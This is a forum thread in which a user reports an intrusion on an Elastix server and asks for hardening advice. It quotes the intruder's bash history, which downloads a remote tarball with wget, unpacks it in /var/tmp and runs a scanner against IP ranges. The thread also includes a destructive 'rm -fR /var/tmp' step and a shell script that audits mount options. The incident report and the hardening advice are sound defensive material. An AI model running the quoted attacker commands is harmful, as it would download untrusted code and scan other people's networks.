Elastix Security exploit with /tmp & /var/tmp

Looks like an exploit in Elastix where an unauthorized user is able to create a user
called "test"; then, from the /home/test directory, they are able to download a scan script tar file to /var/tmp, where it is untarred and executed.

Here is the "/home/test/.bash_history":

w
uname -a
passwd
passwd
cat /proc/cpuinfo
cd /var/tmp
cd scan
./a 216.14
./a 216.17
./a 216.20
./a 216.161
./a 216.162
./a 216.163
w
cd /tmp
ls
cd
ls
cd /var/tmp
ls
wget geocities.com/datacorz/on.tgz
tar xzvf on.tgz
cd scan
./a 200.72
./a 200.71
./a 216.141
./a 216.24
./a 216.151
./a 216.152


I deleted /var/tmp with

rm -fR /var/tmp

then created a symlink to /tmp:

ln -s /tmp /var/tmp

I would also recommend mounting /tmp as noexec,nosuid,rw, as well as running iptables or some firewall.

Any other security recommendations for stock Elastix would be highly appreciated :)
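As an added example (not code from the post above), here is a small POSIX shell audit that reads a /proc/mounts-style file and confirms /tmp and /var/tmp carry the nosuid,noexec options recommended above; the function names and the sample mounts table are constructed for the example.

```shell
#!/bin/sh
# Added example, not code from the post: audit whether temp directories are
# mounted with the options recommended above (nosuid,noexec), by reading a
# /proc/mounts-style file. Function names and the sample table are my own.

# Print the mount options of mountpoint $2 from the mounts file $1.
# /proc/mounts columns: device mountpoint fstype options dump pass
mount_opts() {
    awk -v mp="$2" '$2 == mp { opts = $4 } END { print opts }' "$1"
}

# Return 0 if every option in the comma list $3 is set on mountpoint $2
# in mounts file $1; otherwise report the first missing option and return 1.
check_tmp_mount() {
    opts=$(mount_opts "$1" "$2")
    [ -n "$opts" ] || { echo "$2: not a separate mount"; return 1; }
    for want in $(printf '%s' "$3" | tr ',' ' '); do
        case ",$opts," in
            *",$want,"*) ;;
            *) echo "$2: missing $want (have $opts)"; return 1 ;;
        esac
    done
    echo "$2: ok ($opts)"
}

# Check both directories the intruder used; return 1 if either is weak.
audit_tmp_mounts() {
    rc=0
    for mp in /tmp /var/tmp; do
        check_tmp_mount "$1" "$mp" nosuid,noexec || rc=1
    done
    return $rc
}

# Constructed sample: /tmp hardened, /var/tmp a plain rw mount, i.e. the state
# in which a downloaded tarball can be unpacked and run from /var/tmp.
SAMPLE_MOUNTS=$(mktemp)
cat > "$SAMPLE_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda3 /var/tmp ext3 rw,relatime 0 0
EOF

# Run against the sample; pass /proc/mounts instead to audit a live system.
audit_tmp_mounts "$SAMPLE_MOUNTS" || echo "temp directories need hardening"
```

A directory that is not its own mount (reported as "not a separate mount") inherits the root filesystem's options, so it counts as unhardened too.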
 

lek

Thanks for the info, itakinet.

One question: what does the file on.tgz contain?
 
